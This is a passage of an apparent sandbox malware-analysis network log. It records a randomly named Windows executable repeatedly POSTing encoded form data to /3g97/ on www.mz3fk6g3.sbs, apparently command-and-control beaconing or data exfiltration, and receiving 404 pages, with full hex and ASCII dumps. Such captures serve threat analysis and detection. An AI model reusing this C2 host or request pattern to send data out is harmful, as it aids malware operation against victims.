6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                                                              Apr 24, 2024 07:26:47.027110100 CEST451INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449747172.217.16.36801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:49.463195086 CEST745OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 55 42 79 6e 4b 73 52 6d 6c 68 30 72 62 74 76 52 31 44 55 69 36 57 4e 77 4b 4b 4c 51 70 2f 59 65 55 6f 43 6a 5a 50 7a 38 63 39 42 45 59 31 44 63 6d 4c 34 4b 62 66 68 33 64 6d 70 30 51 65 7a 39 66 6a 50 58 7a 68 4e 36 6d 31 35 75 33 58 4e 68 6c 35 5a 7a 34 42 77 6a 57 4d 4b 32 30 54 4c 76 61 4d 30 31 4c 38 6a 39 6b 55 51 6e 2b 45 4f 6f 38 78 41 78 37 78 5a 4b 47 4e 76 36 6b 43 79 45 4b 5a 49 58 35 4d 68 34 67 64 66 71 37 7a 4b 43 63 57 71 39 73 64 36 36 50 64 4f 78 77 59 41 43 35 69 45 39 31 75 38 61 51 79 7a 68 48 78 74 44 64 67 42 6f 39 78 38 59 4b 5a 41 61 6d 49 47 51 42 43 50 53 71 33 33 32 55 4c 36 4e 6f 2f 4a 62 43 74 7a 31 77 71 55 3d
                                                                                              Data Ascii: 12l42=UBynKsRmlh0rbtvR1DUi6WNwKKLQp/YeUoCjZPz8c9BEY1DcmL4Kbfh3dmp0Qez9fjPXzhN6m15u3XNhl5Zz4BwjWMK20TLvaM01L8j9kUQn+EOo8xAx7xZKGNv6kCyEKZIX5Mh4gdfq7zKCcWq9sd66PdOxwYAC5iE91u8aQyzhHxtDdgBo9x8YKZAamIGQBCPSq332UL6No/JbCtz1wqU=
                                                                                              Apr 24, 2024 07:26:49.881474972 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:49 GMT
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                                                              Apr 24, 2024 07:26:49.881500006 CEST451INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449748172.217.16.36801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:52.311630964 CEST10827OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.mz3fk6g3.sbs
                                                                                              Referer: http://www.mz3fk6g3.sbs/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 55 42 79 6e 4b 73 52 6d 6c 68 30 72 62 74 76 52 31 44 55 69 36 57 4e 77 4b 4b 4c 51 70 2f 59 65 55 6f 43 6a 5a 50 7a 38 63 39 4a 45 59 67 58 63 6d 73 55 4b 61 66 68 33 53 32 70 50 51 65 7a 67 66 6a 48 54 7a 68 78 31 6d 33 78 75 30 31 31 68 6a 49 5a 7a 6a 78 77 6a 59 63 4b 33 71 6a 4c 41 61 4d 6b 70 4c 39 54 39 6b 55 51 6e 2b 46 65 6f 72 7a 6b 78 35 78 5a 4a 57 64 76 4d 31 53 79 67 4b 5a 67 6d 35 4d 6b 48 6a 73 2f 71 69 54 61 43 61 6b 79 39 32 64 36 30 4f 64 50 6b 77 59 4e 63 35 6d 64 45 31 75 49 38 51 77 76 68 57 46 77 6c 47 79 70 51 6b 79 59 52 59 4a 45 2f 68 4c 4b 6f 59 41 33 74 69 6c 48 4a 57 72 2b 35 73 66 64 65 66 66 66 45 68 2f 44 36 79 71 74 79 42 39 43 41 44 33 62 53 68 38 72 56 65 33 78 66 4b 73 58 69 52 49 62 78 49 4e 67 68 37 58 6e 55 6f 54 77 70 58 34 6a 2b 72 39 55 4f 65 4a 38 62 4d 4c 2f 54 4f 58 78 69 48 41 38 61 49 35 7a 39 44 62 56 47 38 6a 44 39 34 50 35 6b 42 52 55 4b 36 33 70 55 4b 7a 55 69 42 68 55 44 58 46 4e 33 63 65 53 30 6a 47 74 61 78 55 6b 2f 77 48 69 70 37 34 44 52 4f 65 66 73 48 56 37 6e 55 38 33 6b 35 49 39 62 78 6f 54 43 79 71 70 42 68 70 55 37 54 4a 68 33 57 74 6c 74 42 66 46 4c 76 67 48 4e 6c 70 6f 75 51 74 32 5a 37 4e 55 45 4e 56 4a 51 51 32 75 75 4d 67 2f 6a 62 59 6f 6e 47 58 66 43 53 2b 2f 54 39 4a 42 7a 77 6e 53 72 4a 54 6b 64 55 2f 54 70 53 48 31 31 63 48 43 6e 56 59 6d 41 63 74 73 38 34 35 59 6d 73 50 49 53 75 2f 43 34 44 72 51 73 65 6d 49 6f 48 46 59 31 6a 6a 49 4e 2f 6a 37 75 57 55 55 74 56 51 66 62 4c 68 7a 6c 44 51 58 63 45 71 38 6c 53 65 67 65 41 49 4c 65 61 50 7a 2b 6b 66 71 59 38 5a 63 34 54 72 37 46 38 54 6e 30 31 44 68 68 4f 6e 49 6d 70 6a 57 68 78 65 67 78 48 33 64 65 69 51 45 75 38 33 41 6a 4d 74 33 74 34 30 45 61 62 78 70 49 69 32 47 65 45 63 30 43 78 52 31 72 65 37 46 70 70 56 39 39 70 6d 45 62 73 43 37 47 39 63 6b 58 4f 6c 31 6c 33 6f 32 79 66 30 71 74 50 77 4b 6c 69 58 33 4c 66 35 54 76 32 63 64 35 4f 61 70 59 57 6b 51 55 43 30 74 72 33 63 48 75 33 36 48 61 66 77 34 32 4e 55 35 56 45 2b 48 66 58 54 35 38 56 4b 54 7a 49 49 57 67 50 34 6b 50 51 67 58 67 52 50 48 64 71 31 5a 54 58 64 5a 35 36 6b 52 4e 76 4b 51 6b 6b 6a 51 52 68 76 57 47 73 50 59 69 4c 2f 54 43 49 50 2b 7a 50 6f 33 79 68 68 6c 76 4c 77 37 38 2f 4d 68 42 72 52 74 4c 69 30 59 50 4c 78 78 33 4d 67 47 54 46 76 4e 56 2b 32 35 74 34 30 67 53 6a 38 70 4c 2b 49 49 49 61 32 34 37 68 70 66 4a 6e 71 4e 66 68 68 42 2f 63 34 78 61 55 57 52 4c 71 37 61 77 72 31 46 46 62 78 37 2f 4d 6e 79 6a 75 71 4c 6f 70 58 70 64 75 42 68 59 42 47 38 32 64 53 43 46 74 63 59 77 2b 75 6e 53 6c 70 63 32 61 77 6b 52 62 4e 72 73 6f 79 77 37 55 4f 6d 41 2b 35 34 7a 34 72 7a 65 4d 6f 32 5a 68 6f 4c 72 57 67 50 6d 37 30 6e 63 32 58 36 4a 6d 6d 61 58 38 64 61 76 5a 57 64 79 37 56 64 43 62 58 34 6f 2b 49 2b 31 7a 33 42 2b 36 4b 75 71 59 46 79 6e 50 71 65 75 4d 4b 70 63 70 72 79 76 6f 48 59 66 46 4e 39 47 64 61 65 53 52 37 44 7a 33 75 36 6c 77 45 37 51 38 51 39 36 68 6c 59 5a 4e 37 66 30 4d 79 51 49 56 77 43 5a 4f 56 39 50 35 32 39 2f 4a 37 34 62 34 69 2b 7a 6e 6e 58 44 4d 66 51 59 39 66 36 5a 32 6a 52 33 33 30 35 67 67 47 48 4a 68 76 52 36 62 47 42 42 74 53 62 4a 48 6d 63 41 49 75 6c 77 49 42 63 66 63 4e 37 39 43 35 4d 67 51 7a 70 53 33 68 79 33 65 45 4f 51 79 6a 39 69 38 56 5a 54 6d 4f 43 54 73 45 62 2f 42 72 4e 50 2b 33 42 55 78 61 6f 72 35 63 6b 69 64 71 67 72 61 64 38 79 4b 67 75 65 49 34 2b 7a 69 73 78 59 70 69 48 4b 64 74 65 48 51 31 53 7a 57 42 70 68 30 62 30 4f 46 6a 70 50 73 4a 68 35 66 43 4c 72 4b 2f 6c 64 6c 7a 68 64 77 75 4b 71 4b 44 33 45 4d 58 42 51 62 71 71 36 79 4a 6b 6a 62 66 46 4e 52 6c 4e 59 5a 6f 68 62 70 59 4d 45 4a 6f 2f 42 7a 67 64 57 77 6d 2f 55 52 37 72 6a 67 46 68 62 50 5a 66 68 54 70 72 5a 37 2b 6c 34 49 62 71 78 31 73 55 6b 61 47 77 71 63 79 57 59 52 56 47 4c 65 64 4d 43 64 47 63 42 31 57 5a 72 64 57 73 68 6f 61 48 4f 2f 4d 7a 32 4f 32 36 55 36 78 61 73 62 37 30 42 2b 61 7a 4f 70 48 46 59 71 72 34 4f 49 75 74 4e 38 4b 61 47 54 31 46 74 62 6a 6f 37 34 68 31 66 37 36 54 4b 57 4b 51 64 6f 73 33 70 32 44 44 38 53 41 4b 34 70 61 35 6b 42 43 47 78 75 4d 32 66 33 70 52 63 72 5a 44 7a 4e 36 49 33 51
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:26:52.731326103 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:52 GMT
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 